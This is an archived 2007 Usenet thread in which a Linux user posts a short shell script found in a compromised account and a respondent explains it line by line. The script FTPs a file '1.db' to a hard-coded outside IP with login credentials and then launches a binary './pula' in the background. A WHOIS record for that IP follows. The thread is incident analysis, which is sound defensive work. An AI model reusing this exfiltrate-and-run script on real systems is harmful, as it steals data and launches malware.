Re: Phishing Attempt

On Tue, 02 Oct 2007 14:46:04 -0500:

On Tue, 02 Oct 2007, in the Usenet newsgroup comp.os.linux.security, in article
<47024555$0$15142$afc38c87@xxxxxxxxxxxxxxxxxxxx>, Mark wrote:

Mark wrote:

The account home directory contained a simple shell script of just over
a dozen lines I can't see what it's doing there.

OK below is the text of the script as it was sent back to me.

Confusion - above you say the script was in the home directory, while
here, you say it was sent back to you. WTF?

I can normally understand shell scripts, but I can't see what this one
is doing.

Your Linux box may only have a soft link from /usr/share/man/man1/sh.1
to something else - probably /usr/share/man/man1/bash.1 - you can follow
that to see what it's doing.

[useless empty lines deleted]

#!/bin/sh
HOST=3D'58.105.225.59'

That sets the variable 'HOST' to the IP address you are posting from.
The '=3D' is a mime abortion which actually translates to an equal sign.

USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'

Setting three more variables - what is the contents of file "1.db" in
this home directory?

=20

More mime crap - actual a space character

ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT

run the ftp command, connecting to the ftp server on 58.105.225.59,
logging in as user test with password testing, and uploading the file
'1.db' from the current directory on the host this script is run from,
and then quitting.

sleep 70
./pula &

Sleep for 70 seconds, and then run the application 'pula' which is also
in the current directory, putting that application into the background.

'pula' is a city in Croatia (14E/45N), the currency of Botswana (where
it apparently means "rain"), and seems to be some form of windoze worm
or virus that may have originated in Indonesia. I hadn't heard of it
effecting Linux before, and it doesn't show up in the list of malware
searched for in the windoze-wannabe "tools" chkrootkit or rkhunter.
Perhaps you should be looking at that file - starting with the command

file ./pula

if you haven't wiped the directory already.

exit 0

That's the end of the script. Not knowing what's in the 'pula' file,
it's not possible to say what's going on, but this thing you quoted
seems to be running the 'pula' file, sleeping for 70 seconds. It's
also ftp'ing a file named '1.db' to the ftp account 'test' on the host
58.105.225.59. Did you look to see what is in there?

Actually, this looks more as if the host 58.105.225.59 is/was being used
as a 'drop-box', and you may find it useful searching that system to see
where the files are going. It _could_ be that another computer elsewhere
was connecting to the ftp server on 58.105.225.59 using the same account
name/password, and 'get'ing (and perhaps removing) the file, in which
case the only evidence might be in the (non-existent) ftp server logs.

Old guy


This guy is probably unaware and his box has been hacked to be a relay:

% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 58.104.0.0 - 58.111.255.255
netname: OPTUSINTERNET-AU
descr: OPTUS INTERNET - RETAIL
descr: INTERNET SERVICES
descr: Chatswood, Sydney
country: AU
admin-c: OI3-AP
tech-c: OI3-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-AU-OPTUSINTERNET
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@xxxxxxxxx 20050422
changed: hm-changed@xxxxxxxxx 20061110
source: APNIC

role: Optus Internet
address: Level 3, 11 Help Street
address: Chatswood, NSW 2067
country: AU
phone: +61-2-9027-1127
fax-no: +61-2-9027-1035
e-mail: oie-netops@xxxxxxxxxxxx
trouble: Send spam/abuse reports to abuse@xxxxxxxxxxxxxxx
admin-c: OI1-AP
tech-c: OI1-AP
nic-hdl: OI3-AP
notify: oie-netops@xxxxxxxxxxxx
mnt-by: MAINT-AU-OPTUSINTERNET
changed: oie-netops@xxxxxxxxxxxx 20040502
changed: hm-changed@xxxxxxxxx 20041020
changed: hm-changed@xxxxxxxxx 20041020
source: APNIC

--
Posted via a free Usenet account from http://www.teranews.com

.

Relevant Pages

  • Re: Need help with a bat script
    ... > I am trying to write a script to check the Timestamp of files posted ... > an account on the ftp server. ... The script will send an error message if the ...
    (microsoft.public.win2000.cmdprompt.admin)
  • Protecting against dDOS bots (was: Newbie php problem)
    ... The form mail script posted that was used, ... requires the applicant to pass some kind of Turing test, ... Turing test if the account balance ever drops to zero. ... Log into the same account repeatedly, which consumes your credit ...
    (alt.php)
  • Re: Entourage account setup applescript not working
    ... I pasted the script at the end just in case. ... When comparing the account settings on 2 computers, ... This script assists a user with the setup of his Exchange account ... Customize the network and server properties below with information ...
    (microsoft.public.mac.office.entourage)
  • Re: Error 15401 using sp_grantlogin (not addressed by current KB articles)
    ... Restarting Windows 2000 resolved the problem for this particular account, ... confused when it sees a duplicate SID. ... > One way to get SQL Server to agree with the renamed NT ... > Preview (to ensure the script was created), ...
    (microsoft.public.sqlserver.security)
  • Re: Local account creation
    ... While this script works fine for my 2003 environment, ... use the script in a startup GPO so that there a generic local admin account ... Dim objNetwork, strComputer, strUser ...
    (microsoft.public.windows.server.scripting)